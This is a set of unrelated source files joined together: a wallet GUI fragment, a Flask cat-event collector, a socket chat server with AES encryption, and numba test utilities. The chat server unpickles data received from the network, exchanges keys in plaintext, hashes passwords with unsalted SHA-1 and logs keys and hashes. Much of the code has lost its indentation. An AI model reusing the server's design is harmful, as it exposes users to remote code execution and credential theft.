msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def show_account_details(self, k):
account = self.wallet.accounts[k]
d = WindowModalDialog(self, _('Account Details'))
vbox = QVBoxLayout(d)
name = self.wallet.get_account_name(k)
label = QLabel('Name: ' + name)
vbox.addWidget(label)
vbox.addWidget(QLabel(_('Address type') + ': ' + account.get_type()))
vbox.addWidget(QLabel(_('Derivation') + ': ' + k))
vbox.addWidget(QLabel(_('Master Public Key:')))
text = QTextEdit()
text.setReadOnly(True)
text.setMaximumHeight(170)
vbox.addWidget(text)
mpk_text = '\n'.join( account.get_master_pubkeys() )
text.setText(mpk_text)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
|
app.py
|
import sys
import json
import sqlalchemy as sa
from threading import Thread
from flask import Flask, request, jsonify
from flask_httpauth import HTTPBasicAuth
from flask_cors import CORS
from db import engine, Base, Session
from event import Event
from observer import Observer
from config import load_vars
from datetime import datetime, timedelta
from werkzeug.security import generate_password_hash, check_password_hash
def persist_event(event):
session = Session()
session.add(event)
session.commit()
session.close()
def get_last_events(days):
    session = Session()
    query_result = session.query(
        sa.func.concat(sa.func.day(Event.timestamp), '/', sa.func.month(Event.timestamp), '/', sa.func.year(Event.timestamp)),
        sa.func.count(Event.id)
    ).filter(
        Event.timestamp > datetime.today() - timedelta(days=days)
    ).group_by(
        sa.func.year(Event.timestamp), sa.func.month(Event.timestamp), sa.func.day(Event.timestamp)
    ).order_by(Event.timestamp).all()
    session.close()
    return json.dumps(query_result)
def get_events_by_day(day, month, year):
    session = Session()
    result = session.query(
        sa.func.hour(Event.timestamp), sa.func.count(Event.id)
    ).filter(
        sa.extract('day', Event.timestamp) == day,
        sa.extract('month', Event.timestamp) == month,
        sa.extract('year', Event.timestamp) == year
    ).group_by(sa.func.hour(Event.timestamp)).order_by(Event.timestamp).all()
    session.close()
    return json.dumps(result)
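# Note: both helpers above return plain JSON arrays of [label, count] pairs, e.g.
# get_last_events() rows look like ["7/3/2021", 4] (day/month/year and event count)
# and get_events_by_day() rows look like [14, 2] (hour of day and event count).
# The values shown here are illustrative and depend entirely on the stored events.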
env_vars = load_vars()
Base.metadata.create_all(engine)
observer = Observer(10, 'asmi-wshop-bucket',
env_vars['AWS_ACCESS_KEY'], env_vars['AWS_SECRET_KEY'])
app = Flask("collector")
auth = HTTPBasicAuth()
CORS(app)
users = {
"root": generate_password_hash(env_vars['BASIC_AUTH_PASSWORD'])
}
@auth.verify_password
def verify_password(username, password):
if username in users and check_password_hash(users.get(username), password):
return username
@app.route("/", methods=['GET'])
def index():
return "collector is running"
@app.route('/pictures', methods=['GET'])
def pictures():
return json.dumps(observer.get_last_pictures(5))
@app.route("/data", methods=['GET'])
def get_data():
try:
days = int(request.args.get('days'))
if days is None or days > 365:
raise ValueError
except (ValueError, TypeError):
days = 10
return get_last_events(days)
@app.route('/detail', methods=['GET'])
def get_detailed_day():
try:
day = int(request.args.get('day'))
month = int(request.args.get('month'))
year = int(request.args.get('year'))
if day is None or day > 31 or month is None or month > 12 or year is None or year < 2018 or year > 2022:
raise ValueError
except (ValueError, TypeError):
return "Bad request", 400
return get_events_by_day(day, month, year)
@app.route("/collect", methods=['POST'])
@auth.login_required()
def collect():
try:
payload = request.get_json()
if "image" not in payload.keys():
return jsonify(message="Invalid request"), 400
found_event = observer.analyze_picture(payload["image"])
if found_event:
Thread(target=persist_event, args=[found_event]).start()
print("Stored cat event")
return "OK"
except:
return jsonify(message="An error occurred"), 500
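# A hedged usage sketch (not part of the application): how a client might call these
# endpoints, assuming the Flask development server's default port 5000. The credentials
# and base64 payload are hypothetical placeholders; only the "root" user defined above
# actually exists.
#
#     curl -u root:<BASIC_AUTH_PASSWORD> \
#          -H "Content-Type: application/json" \
#          -d '{"image": "<base64-encoded picture>"}' \
#          http://localhost:5000/collect
#
#     curl "http://localhost:5000/data?days=30"
#     curl "http://localhost:5000/detail?day=1&month=6&year=2021"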
|
Server.py
|
# Imports
import socket # Communication
import threading # Communication with multiple users at once
import pickle # Serialising data
import hashlib # Hashing passwords
from Crypto.Cipher import AES # AES encryption algorithms
from Crypto.Random import get_random_bytes # For generating random keys and nonces
# A list of codes used in this program to prefix messages, so the client knows their meaning
'''
______________________________________
| CODE | MEANING |
|____________________________________|
? | Signup |
! | Signin |
$ | Control |
@ | Direct Message |
^ | Everyone Message |
* | Request list |
+ | New user online |
- | User logged off |
= | Request pics dict |
p | New profile pic |
_____________________________________|
'''
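# A hedged illustration of the codes above (not used by the server itself): the usernames,
# password and message text are hypothetical examples of what a client would send.
#
#     "?alice hunter2"    -> sign up as alice with password hunter2
#     "!alice hunter2"    -> sign in as alice
#     "@bob hello"        -> direct message "hello" to bob
#     "^hello everyone"   -> message "hello everyone" to all users
#     "*"                 -> request the list of connected users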
# A dictionary storing usernames and passwords
logins = {}
# Dictionary mapping each client socket to its username
record = {}
# Dictionary mapping each username to its client socket
records = {}
# Dictionary mapping each username to the server-generated AES key for that client
keys = {}
# Dictionary storing profile pictures
pics = {}
# List to keep track of socket descriptors
connected_list = []
# A dictionary of username -> hashed password, saved to and loaded from loginss.txt
loginss = {}
# Starting the server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Note: execution skips to the end of the file, as these functions are not used until later
# A custom function for sending double-layer encrypted data to clients
def send_to_client(clientsocket, message, key):
# Encrypt with the server-generated key; the client decrypts with that same key
# Serialising message so it can be encrypted
msg = pickle.dumps(message)
# Creating a new cipher
cipher = AES.new(key, AES.MODE_EAX)
# Ciphering the data
# NOTE: WE ARE USING A RANDOMLY GENERATED NONCE, for second layer encryption
ciphered_data, tag = cipher.encrypt_and_digest(msg)
# Packing the data together and serialising it again so it can be sent
tosend = [cipher.nonce, tag, ciphered_data]
tosend = pickle.dumps(tosend)
# Send packaged data
clientsocket.send(tosend)
return
# A custom function to receive client data, then decrypt and verify it
def client_receive(clientsocket, otherkey):
# Receive data
msg = clientsocket.recv(2048)
# Making sure client hasn't disconnected
if not msg:
return "disconnect"
else:
# Separating the packaged data
msg = pickle.loads(msg)
noonce = msg[0]
tag = msg[1]
data = msg[2]
# Creating cipher for decryption
cipher = AES.new(otherkey, AES.MODE_EAX, noonce)
# Verifying integrity of data using a tag
msg = cipher.decrypt_and_verify(data, tag)
# Deserialising data
msg = pickle.loads(msg)
return msg
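# A hedged, self-contained sketch of the two helpers above (never called by the server):
# encrypt a message with a key over a local socket pair, then decrypt and verify it on
# the other end with the same key. Names prefixed with _demo are illustrative only.
def _demo_encrypted_round_trip():
    server_end, client_end = socket.socketpair()
    demo_key = get_random_bytes(16)
    # "Server" side: serialise, encrypt and send
    send_to_client(server_end, "$demo-message", demo_key)
    # "Client" side of the same scheme: receive, decrypt and verify with the same key
    received = client_receive(client_end, demo_key)
    assert received == "$demo-message"
    server_end.close()
    client_end.close()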
# A custom function for sending data to all clients, except sender
def send_all(sender, message):
for i in connected_list:
if i == sender:
continue
# Finding the socket
receiversoc = records[i]
# Send data using above function
send_to_client(receiversoc, message, keys[i])
# A custom function for sending a message to all users
def msg_all(message, sender):
# Constructing so client knows what this message is
construct = "^"+ sender + " " + message
# Send data using above function
send_all(sender, construct)
# A custom function for telling all clients about a new logon
def new_online(user):
# Constructing the notification
construct = '+' + user
# Sending to all using function
send_all(user, construct)
# A custom function to check if a file exists without throwing errors
def file_exists(name):
filename = name + ".txt"
try:
my_file = open(filename)
my_file.close()
return True
except:
return False
# A utility function to allow quick updating of saved passwords and profile pictures
def updatefile(name, obj):
# Open file
with open(name, 'wb+') as file:
# Dump new data
pickle.dump(obj, file)
# The main function for communicating with clients on a new thread
# This handles most work and messaging duties
# NOTE: this is run on one thread per client
def on_new_client(clientsocket,addr):
# A string for storing username
username = ''
# Encryption Handshake
print("NETOWRK: Attempting handshake with: " + addr[0] + ":" + str(addr[1]))
# Generating a new COMPLETELY RANDOM key
key = get_random_bytes(16)
# Exchanging keys in plaintext (not secure)
clientsocket.send(key)
# Receiving other key
otherkey = clientsocket.recv(1024)
# Printing it on console
print("NETWORK: Server key: " + str(key) + ", "+ str(addr[0]) + ":" + str(addr[1]) + " key:", str(otherkey))
# Wrapped in try except to detect logging off of users
try:
# Attempting sign in and sign up
while True:
# Receive data
login = client_receive(clientsocket, otherkey)
print("DEBUG: login / signup attempt", login)
# Making sure the client hasn't disconnected
if login == "disconnect":
clientsocket.close()
break
# Splitting username and password, clients have already validated input
user, passw = login[1:].split()
passw = passw.encode("utf-8")
# Hashing the password
passw = hashlib.sha1(passw)
# Storing hashed password in hex form
passw = passw.hexdigest()
print("DEBUG: Hashed password is: " + str(passw))
# if sign up else if login attempt
if(login[0] == '?'):
# Creating an account
# If user hasn't already signed up
if user not in loginss:
# Store username and password combo in memory
loginss[user] = passw;
# Tell the client
send_to_client(clientsocket, "$success-signup", key)
# Give them default profile pic
pics[user] = 0
# Update relevant storage
updatefile("loginss.txt", loginss)
updatefile("pic.txt", pics)
print("USERS:", user, "signed up")
else:
# Else tell them they failed
send_to_client(clientsocket, "$fail-signup", key)
print("USERS: Received failed signup")
continue
elif(login[0] == '!'):
# Logging in
# In a try except to prevent key errors
try:
if(loginss[user] == passw):
# This is a successful login
# Marking such on server
username = user
# Tell the client
send_to_client(clientsocket, "$success-login", key)
print("USERS:", username, "signed in")
break
else:
# Unsuccessful login
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
except:
# Probably key error, they need to sign up first
# Tell them they failed
send_to_client(clientsocket, "$fail-login", key)
# Only if they have logged in successfully
if(username != ''):
# If they are not connected (should be almost always)
if username not in connected_list:
# Mark their username as connected
connected_list.append(username)
# Tell clients about new profile picture and new client username
send_all(username, "p"+str(pics[username])+" "+username)
new_online(username)
print("USERS: Sent", username, "is online")
# Record sockets and keys for easy access by utility functions
record[clientsocket] = username
records[username] = clientsocket
keys[username] = key
# Listen and act until told not to
while True:
# Receive using function
msg = client_receive(clientsocket, otherkey)
# Make sure the client hasn't disconnected
if msg == "disconnect":
# If they have tell other clients and remove them from lists
connected_list.remove(username)
del keys[username]
clientsocket.close()
send_all("", "-"+username)
print("Users: " + username + " quit")
break
# Interpreting commands from clients using the codes from the table at the top
if msg[0] == '@':
# Split message
recievername = msg[1:].split(" ", 1)
# Determine sockets and keys
receiversoc = records[recievername[0]]
reckey = keys[recievername[0]]
# Create message
tosend = "@" + username + " " + recievername[1]
print("MESSAGES: " + username + " SENT " + recievername[1] + " TO " + recievername[0])
# Send
send_to_client(receiversoc, tosend, reckey)
elif msg[0] == '^':
# Determine sendername
sendername = record[clientsocket]
# Remove whitespace
tosend = msg[1:].strip()
print("MESSAGES: " + sendername + " SENT " + tosend + " TO ALL USERS")
# Send to all using function
msg_all(tosend, sendername)
elif msg[0] == '*':
# If request connected list, send list
print("DEBUG:", username, "requested list")
send_to_client(clientsocket, connected_list, key)
elif msg[0] == 'p':
# Determine sendername
sendername = record[clientsocket]
# Update memory list and file
pics[sendername] = msg[1]
updatefile("pic.txt", pics)
# Tell other clients of updated picture
send_all('', msg + " " + sendername)
print("USERS:", sendername, "changed their profile picture to:", msg[1])
elif msg[0] == '=':
# If request pic dict, send pic dict
print("DEBUG:", username, "requested pics dict")
send_to_client(clientsocket, pics, key)
except:
# This is usually a logoff
try:
# This is when they are registered and logged in
clientsocket.close()
connected_list.remove(username)
del keys[username]
# Tell other clients
send_all("", "-"+username)
print("USERS: " + username + " quit")
except:
# If they aren't registered, the above code will have already closed the socket, so just log it and quit
print("USERS: Non-Authenicated user quit")
# Code skips to here
# Check if both files exist and populate memory with their contents if they do
# If they don't, set memory contents to empty and create files
# Also log it at the end, so the server runner knows what just happened
if file_exists("loginss") == False:
file = open("loginss.txt", "w+")
file.close()
with open('loginss.txt', 'rb') as file:
try:
loginss = pickle.load(file)
except:
print("DEBUG: Failed reading file (the login file is probably empty, no need to worry)")
if file_exists("pic") == False:
file = open("pic.txt", "w+")
file.close()
with open('pic.txt', 'rb') as file:
try:
pics = pickle.load(file)
except:
print("DEBUG: Failed reading file (the pic file is probably empty, no need to worry)")
# An empty host string binds the socket to all available interfaces
host = ''
# Setting the port
port = 443
# Bind to the port
s.bind((host, port))
# Allow a backlog of up to ten queued connection attempts
s.listen(10)
# Now wait for client connection.
print("DEBUG: Started on:", (host, port))
print("DEBUG: Ready for clients")
while True:
# Blocking call, waits to accept a connection
conn, addr = s.accept()
# Log it
print("NETWORK: Connected to " + addr[0] + ":" + str(addr[1]))
# Start a new thread for the new client
threading.Thread(target=on_new_client, args=(conn,addr)).start()
print("\nDEBUG: Started new thread")
# The main thread continues the listening loop, assigning a new thread to each new client
# In the rare case we are here, close down the server socket gracefully and then quit
s.close()
|
support.py
|
"""
Assorted utilities for use in tests.
"""
from __future__ import print_function
import cmath
import contextlib
import enum
import errno
import gc
import math
import os
import shutil
import subprocess
import sys
import tempfile
import time
import traceback
import io
import ctypes
import multiprocessing as mp
import warnings
from contextlib import contextmanager
import numpy as np
try:
import scipy
except ImportError:
scipy = None
from numba import config, errors, typing, utils, numpy_support, testing
from numba.compiler import compile_extra, compile_isolated, Flags, DEFAULT_FLAGS
from numba.targets import cpu
import numba.unittest_support as unittest
from numba.runtime import rtsys
from numba.six import PY2
enable_pyobj_flags = Flags()
enable_pyobj_flags.set("enable_pyobject")
force_pyobj_flags = Flags()
force_pyobj_flags.set("force_pyobject")
no_pyobj_flags = Flags()
nrt_flags = Flags()
nrt_flags.set("nrt")
tag = testing.make_tag_decorator(['important', 'long_running'])
_windows_py27 = (sys.platform.startswith('win32') and
sys.version_info[:2] == (2, 7))
_32bit = sys.maxsize <= 2 ** 32
_reason = 'parfors not supported'
skip_parfors_unsupported = unittest.skipIf(_32bit or _windows_py27, _reason)
skip_py38_or_later = unittest.skipIf(
utils.PYVERSION >= (3, 8),
"unsupported on py3.8 or later"
)
skip_tryexcept_unsupported = unittest.skipIf(
utils.PYVERSION < (3, 7),
"try-except unsupported on py3.6 or earlier"
)
skip_tryexcept_supported = unittest.skipIf(
utils.PYVERSION >= (3, 7),
"try-except supported on py3.7 or later"
)
_msg = "SciPy needed for test"
skip_unless_scipy = unittest.skipIf(scipy is None, _msg)
class CompilationCache(object):
"""
A cache of compilation results for various signatures and flags.
This can make tests significantly faster (or less slow).
"""
def __init__(self):
self.typingctx = typing.Context()
self.targetctx = cpu.CPUContext(self.typingctx)
self.cr_cache = {}
def compile(self, func, args, return_type=None, flags=DEFAULT_FLAGS):
"""
Compile the function or retrieve an already compiled result
from the cache.
"""
from numba.targets.registry import cpu_target
cache_key = (func, args, return_type, flags)
try:
cr = self.cr_cache[cache_key]
except KeyError:
# Register the contexts in case for nested @jit or @overload calls
# (same as compile_isolated())
with cpu_target.nested_context(self.typingctx, self.targetctx):
cr = compile_extra(self.typingctx, self.targetctx, func,
args, return_type, flags, locals={})
self.cr_cache[cache_key] = cr
return cr
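# A minimal usage sketch (hypothetical names): share one CompilationCache across a test
# class so repeated (func, args, return_type, flags) signatures are compiled only once.
#
#     cache = CompilationCache()
#     cr = cache.compile(pyfunc, (numba.types.intp,), flags=no_pyobj_flags)
#     got = cr.entry_point(3)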
class TestCase(unittest.TestCase):
longMessage = True
# A random state yielding the same random numbers for any test case.
# Use as `self.random.<method name>`
@utils.cached_property
def random(self):
return np.random.RandomState(42)
def reset_module_warnings(self, module):
"""
Reset the warnings registry of a module. This can be necessary
as the warnings module is buggy in that regard.
See http://bugs.python.org/issue4180
"""
if isinstance(module, str):
module = sys.modules[module]
try:
del module.__warningregistry__
except AttributeError:
pass
@contextlib.contextmanager
def assertTypingError(self):
"""
A context manager that asserts the enclosed code block fails
compiling in nopython mode.
"""
_accepted_errors = (errors.LoweringError, errors.TypingError,
TypeError, NotImplementedError)
with self.assertRaises(_accepted_errors) as cm:
yield cm
@contextlib.contextmanager
def assertRefCount(self, *objects):
"""
A context manager that asserts the given objects have the
same reference counts before and after executing the
enclosed block.
"""
old_refcounts = [sys.getrefcount(x) for x in objects]
yield
new_refcounts = [sys.getrefcount(x) for x in objects]
for old, new, obj in zip(old_refcounts, new_refcounts, objects):
if old != new:
self.fail("Refcount changed from %d to %d for object: %r"
% (old, new, obj))
@contextlib.contextmanager
def assertNoNRTLeak(self):
"""
A context manager that asserts no NRT leak was created during
the execution of the enclosed block.
"""
old = rtsys.get_allocation_stats()
yield
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free,
"number of data allocs != number of data frees")
self.assertEqual(total_mi_alloc, total_mi_free,
"number of meminfo allocs != number of meminfo frees")
_bool_types = (bool, np.bool_)
_exact_typesets = [_bool_types, utils.INT_TYPES, (str,), (np.integer,),
(utils.text_type), (bytes, np.bytes_)]
_approx_typesets = [(float,), (complex,), (np.inexact)]
_sequence_typesets = [(tuple, list)]
_float_types = (float, np.floating)
_complex_types = (complex, np.complexfloating)
def _detect_family(self, numeric_object):
"""
This function returns a string description of the type family
that the object in question belongs to. Possible return values
are: "exact", "complex", "approximate", "sequence", and "unknown"
"""
if isinstance(numeric_object, np.ndarray):
return "ndarray"
if isinstance(numeric_object, enum.Enum):
return "enum"
for tp in self._sequence_typesets:
if isinstance(numeric_object, tp):
return "sequence"
for tp in self._exact_typesets:
if isinstance(numeric_object, tp):
return "exact"
for tp in self._complex_types:
if isinstance(numeric_object, tp):
return "complex"
for tp in self._approx_typesets:
if isinstance(numeric_object, tp):
return "approximate"
return "unknown"
def _fix_dtype(self, dtype):
"""
Fix the given *dtype* for comparison.
"""
# Under 64-bit Windows, Numpy may return either int32 or int64
# arrays depending on the function.
if (sys.platform == 'win32' and sys.maxsize > 2**32 and
dtype == np.dtype('int32')):
return np.dtype('int64')
else:
return dtype
def _fix_strides(self, arr):
"""
Return the strides of the given array, fixed for comparison.
Strides for 0- or 1-sized dimensions are ignored.
"""
if arr.size == 0:
return [0] * arr.ndim
else:
return [stride / arr.itemsize
for (stride, shape) in zip(arr.strides, arr.shape)
if shape > 1]
def assertStridesEqual(self, first, second):
"""
Test that two arrays have the same shape and strides.
"""
self.assertEqual(first.shape, second.shape, "shapes differ")
self.assertEqual(first.itemsize, second.itemsize, "itemsizes differ")
self.assertEqual(self._fix_strides(first), self._fix_strides(second),
"strides differ")
def assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None
):
"""
Versatile equality testing function with more built-in checks than
standard assertEqual().
For arrays, test that layout, dtype, shape are identical, and
recursively call assertPreciseEqual() on the contents.
For other sequences, recursively call assertPreciseEqual() on
the contents.
For scalars, test that the two scalars have similar types and are
equal up to a computed precision.
If the scalars are instances of exact types or if *prec* is
'exact', they are compared exactly.
If the scalars are instances of inexact types (float, complex)
and *prec* is not 'exact', then the number of significant bits
is computed according to the value of *prec*: 53 bits if *prec*
is 'double', 24 bits if *prec* is single. This number of bits
can be lowered by raising the *ulps* value.
ignore_sign_on_zero can be set to True if zeros are to be considered
equal regardless of their sign bit.
abs_tol if this is set to a float value its value is used in the
following. If, however, this is set to the string "eps" then machine
precision of the type(first) is used in the following instead. This
kwarg is used to check if the absolute difference in value between first
and second is less than the value set, if so the numbers being compared
are considered equal. (This is to handle small numbers typically of
magnitude less than machine precision).
Any value of *prec* other than 'exact', 'single' or 'double'
will raise an error.
"""
try:
self._assertPreciseEqual(first, second, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
except AssertionError as exc:
failure_msg = str(exc)
# Fall off of the 'except' scope to avoid Python 3 exception
# chaining.
else:
return
# Decorate the failure message with more information
self.fail("when comparing %s and %s: %s" % (first, second, failure_msg))
def _assertPreciseEqual(self, first, second, prec='exact', ulps=1,
msg=None, ignore_sign_on_zero=False,
abs_tol=None):
"""Recursive workhorse for assertPreciseEqual()."""
def _assertNumberEqual(first, second, delta=None):
if (delta is None or first == second == 0.0
or math.isinf(first) or math.isinf(second)):
self.assertEqual(first, second, msg=msg)
# For signed zeros
if not ignore_sign_on_zero:
try:
if math.copysign(1, first) != math.copysign(1, second):
self.fail(
self._formatMessage(msg,
"%s != %s" %
(first, second)))
except TypeError:
pass
else:
self.assertAlmostEqual(first, second, delta=delta, msg=msg)
first_family = self._detect_family(first)
second_family = self._detect_family(second)
assertion_message = "Type Family mismatch. (%s != %s)" % (first_family,
second_family)
if msg:
assertion_message += ': %s' % (msg,)
self.assertEqual(first_family, second_family, msg=assertion_message)
# We now know they are in the same comparison family
compare_family = first_family
# For recognized sequences, recurse
if compare_family == "ndarray":
dtype = self._fix_dtype(first.dtype)
self.assertEqual(dtype, self._fix_dtype(second.dtype))
self.assertEqual(first.ndim, second.ndim,
"different number of dimensions")
self.assertEqual(first.shape, second.shape,
"different shapes")
self.assertEqual(first.flags.writeable, second.flags.writeable,
"different mutability")
# itemsize is already checked by the dtype test above
self.assertEqual(self._fix_strides(first),
self._fix_strides(second), "different strides")
if first.dtype != dtype:
first = first.astype(dtype)
if second.dtype != dtype:
second = second.astype(dtype)
for a, b in zip(first.flat, second.flat):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "sequence":
self.assertEqual(len(first), len(second), msg=msg)
for a, b in zip(first, second):
self._assertPreciseEqual(a, b, prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "exact":
exact_comparison = True
elif compare_family in ["complex", "approximate"]:
exact_comparison = False
elif compare_family == "enum":
self.assertIs(first.__class__, second.__class__)
self._assertPreciseEqual(first.value, second.value,
prec, ulps, msg,
ignore_sign_on_zero, abs_tol)
return
elif compare_family == "unknown":
# Assume these are non-numeric types: we will fall back
# on regular unittest comparison.
self.assertIs(first.__class__, second.__class__)
exact_comparison = True
else:
assert 0, "unexpected family"
# If a Numpy scalar, check the dtype is exactly the same too
# (required for datetime64 and timedelta64).
if hasattr(first, 'dtype') and hasattr(second, 'dtype'):
self.assertEqual(first.dtype, second.dtype)
# Mixing bools and non-bools should always fail
if (isinstance(first, self._bool_types) !=
isinstance(second, self._bool_types)):
assertion_message = ("Mismatching return types (%s vs. %s)"
% (first.__class__, second.__class__))
if msg:
assertion_message += ': %s' % (msg,)
self.fail(assertion_message)
try:
if cmath.isnan(first) and cmath.isnan(second):
# The NaNs will compare unequal, skip regular comparison
return
except TypeError:
# Not floats.
pass
# if absolute comparison is set, use it
if abs_tol is not None:
if abs_tol == "eps":
rtol = np.finfo(type(first)).eps
elif isinstance(abs_tol, float):
rtol = abs_tol
else:
raise ValueError("abs_tol is not \"eps\" or a float, found %s"
% abs_tol)
if abs(first - second) < rtol:
return
exact_comparison = exact_comparison or prec == 'exact'
if not exact_comparison and prec != 'exact':
if prec == 'single':
bits = 24
elif prec == 'double':
bits = 53
else:
raise ValueError("unsupported precision %r" % (prec,))
k = 2 ** (ulps - bits - 1)
delta = k * (abs(first) + abs(second))
else:
delta = None
if isinstance(first, self._complex_types):
_assertNumberEqual(first.real, second.real, delta)
_assertNumberEqual(first.imag, second.imag, delta)
elif isinstance(first, (np.timedelta64, np.datetime64)):
# Since Np 1.16 NaT == NaT is False, so special comparison needed
if numpy_support.version >= (1, 16) and np.isnat(first):
self.assertEqual(np.isnat(first), np.isnat(second))
else:
_assertNumberEqual(first, second, delta)
else:
_assertNumberEqual(first, second, delta)
def run_nullary_func(self, pyfunc, flags):
"""
Compile the 0-argument *pyfunc* with the given *flags*, and check
it returns the same result as the pure Python function.
The got and expected results are returned.
"""
cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
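# A minimal usage sketch, mirroring capture_cache_log() further below: temporarily switch
# on the existing DEBUG_CACHE config variable for the duration of a block.
#
#     with override_config('DEBUG_CACHE', True):
#         ...  # code whose caching behaviour should be logged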
@contextlib.contextmanager
def override_env_config(name, value):
"""
    Return a context manager that temporarily sets the Numba environment variable
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
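# A hedged example of compile_function(); the function name and source string below are
# made up for illustration and the helper is never called by the test suite.
def _demo_compile_function():
    src = "def _square(x):\n    return x * x"
    square = compile_function("_square", src, globals())
    assert square(3) == 9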
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
elif sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
